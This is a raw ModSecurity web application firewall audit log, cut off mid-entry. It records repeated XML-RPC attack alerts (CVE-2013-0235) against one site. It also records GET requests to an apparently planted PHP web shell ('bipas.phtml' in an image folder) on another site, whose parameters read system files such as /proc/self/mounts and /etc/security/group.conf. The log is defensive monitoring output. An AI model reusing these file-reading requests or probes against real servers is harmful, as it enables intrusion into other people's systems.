Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --afd2dc49-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBzE33hoSwVUy254pH8RAAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102803524240 642569 (- - -) Stopwatch2: 1750102803524240 642569; combined=2273, p1=410, p2=1491, p3=41, p4=61, p5=168, sr=106, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --afd2dc49-Z-- --27215c1d-A-- [17/Jun/2025:01:11:04.005837 +0530] aFBzT5lL5_2Zd8wUdfLRRQAAAAg 34.68.37.79 51142 127.0.0.1 7081 --27215c1d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --27215c1d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --27215c1d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBzT5lL5_2Zd8wUdfLRRQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102863349880 656014 (- - -) Stopwatch2: 1750102863349880 656014; combined=2463, p1=389, p2=1612, p3=56, p4=64, p5=205, sr=111, sw=137, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27215c1d-Z-- --c756360f-A-- [17/Jun/2025:01:11:28.743024 +0530] aFBzaBwcFb_n1P0IC9xttgAAAAo 216.73.216.71 50768 127.0.0.1 7081 --c756360f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Ftime.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c756360f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4073 Connection: close Content-Type: text/html; charset=UTF-8 --c756360f-H-- Message: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /snap/core20/2599/etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBzaBwcFb_n1P0IC9xttgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102888739093 3985 (- - -) Stopwatch2: 1750102888739093 3985; combined=2063, p1=338, p2=1588, p3=36, p4=33, p5=68, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c756360f-Z-- --e120ea24-A-- [17/Jun/2025:01:12:03.807328 +0530] aFBzi33hoSwVUy254pH8qAAAACQ 34.68.37.79 43774 127.0.0.1 7081 --e120ea24-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e120ea24-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e120ea24-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBzi33hoSwVUy254pH8qAAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102923112530 694884 (- - -) Stopwatch2: 1750102923112530 694884; combined=2139, p1=390, p2=1301, p3=49, p4=74, p5=199, sr=120, sw=126, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e120ea24-Z-- --98617c47-A-- [17/Jun/2025:01:13:03.766454 +0530] aFBzx5VkCcfT-Z8NQYydYgAAAAc 34.68.37.79 33442 127.0.0.1 7081 --98617c47-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --98617c47-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --98617c47-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBzx5VkCcfT-Z8NQYydYgAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102983115255 651268 (- - -) Stopwatch2: 1750102983115255 651268; combined=2445, p1=367, p2=1621, p3=43, p4=60, p5=214, sr=100, sw=140, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98617c47-Z-- --466e9479-A-- [17/Jun/2025:01:14:03.968991 +0530] aFB0A03CmevS3xeTzmosHwAAAAQ 34.68.37.79 48220 127.0.0.1 7081 --466e9479-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --466e9479-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --466e9479-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFB0A03CmevS3xeTzmosHwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750103043248767 720294 (- - -) Stopwatch2: 1750103043248767 720294; combined=2400, p1=402, p2=1476, p3=79, p4=78, p5=224, sr=112, sw=141, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --466e9479-Z-- --e6bc4c7a-A-- [17/Jun/2025:01:15:05.868454 +0530] aFB0QUcTB7P_sALtclDynwAAAAI 216.73.216.71 53156 127.0.0.1 7081 --e6bc4c7a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fmounts HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --e6bc4c7a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3637 Connection: close Content-Type: text/html; charset=UTF-8 --e6bc4c7a-H-- Message: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/root/proc/self/mounts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/root/proc/self/mounts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0QUcTB7P_sALtclDynwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103105865075 3433 (- - -) Stopwatch2: 1750103105865075 3433; combined=1784, p1=283, p2=1359, p3=34, p4=33, p5=75, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6bc4c7a-Z-- --9dbc5208-A-- [17/Jun/2025:01:15:11.083048 +0530] aFB0R33hoSwVUy254pH9dAAAACQ 216.73.216.71 41628 127.0.0.1 7081 --9dbc5208-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Fgroup.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9dbc5208-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4603 Connection: close Content-Type: text/html; charset=UTF-8 --9dbc5208-H-- Message: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /proc/self/root/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /proc/self/root/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0R33hoSwVUy254pH9dAAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103111078004 5112 (- - -) Stopwatch2: 1750103111078004 5112; combined=2828, p1=447, p2=2223, p3=44, p4=42, p5=72, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9dbc5208-Z-- --abdcca05-A-- [17/Jun/2025:01:15:13.321627 +0530] aFB0Scl682-knofG8qdZ9wAAAAM 184.73.195.18 41892 127.0.0.1 7081 --abdcca05-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/183 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 184.73.195.18 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --abdcca05-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --abdcca05-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/183"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/183"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0Scl682-knofG8qdZ9wAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103113317361 4318 (- - -) Stopwatch2: 1750103113317361 4318; combined=2301, p1=353, p2=1825, p3=38, p4=27, p5=58, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --abdcca05-Z-- --0734ae26-A-- [17/Jun/2025:01:15:16.824589 +0530] aFB0TKC450Yw050Ymr3_NAAAAAk 216.73.216.71 42270 127.0.0.1 7081 --0734ae26-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapt%2Fapt.conf.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0734ae26-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3881 Connection: close Content-Type: text/html; charset=UTF-8 --0734ae26-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0TKC450Yw050Ymr3_NAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103116819614 5027 (- - -) Stopwatch2: 1750103116819614 5027; combined=2165, p1=385, p2=1658, p3=39, p4=28, p5=55, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0734ae26-Z-- --105d2a57-A-- [17/Jun/2025:01:15:36.882845 +0530] aFB0YFJfblPUQiSn5r1q2QAAAAA 35.174.141.243 37782 127.0.0.1 7081 --105d2a57-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/39 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 35.174.141.243 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --105d2a57-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --105d2a57-H-- Message: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/39"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/39"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0YFJfblPUQiSn5r1q2QAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103136878503 4396 (- - -) Stopwatch2: 1750103136878503 4396; combined=2258, p1=373, p2=1756, p3=43, p4=28, p5=58, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --105d2a57-Z-- --81c88a07-A-- [17/Jun/2025:01:15:45.894358 +0530] aFB0aVJfblPUQiSn5r1q2wAAAAA 18.213.27.222 45122 127.0.0.1 7081 --81c88a07-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/80 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.27.222 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --81c88a07-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --81c88a07-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/80"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/self/fd/80"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0aVJfblPUQiSn5r1q2wAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103145889945 4466 (- - -) Stopwatch2: 1750103145889945 4466; combined=2414, p1=364, p2=1918, p3=41, p4=30, p5=61, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81c88a07-Z-- --d6498906-A-- [17/Jun/2025:01:15:54.695144 +0530] aFB0chwcFb_n1P0IC9xuowAAAAo 216.73.216.71 42092 127.0.0.1 7081 --d6498906-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fsecurity%2Fgroup.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d6498906-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4610 Connection: close Content-Type: text/html; charset=UTF-8 --d6498906-H-- Message: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /snap/core20/2582/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /snap/core20/2582/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0chwcFb_n1P0IC9xuowAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103154692361 2834 (- - -) Stopwatch2: 1750103154692361 2834; combined=1299, p1=240, p2=966, p3=25, p4=24, p5=44, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6498906-Z-- --f111b673-A-- [17/Jun/2025:01:16:32.881174 +0530] aFB0mBwcFb_n1P0IC9xuxAAAAAo 107.20.224.184 60838 127.0.0.1 7081 --f111b673-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/119 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 107.20.224.184 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f111b673-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --f111b673-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/119"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file 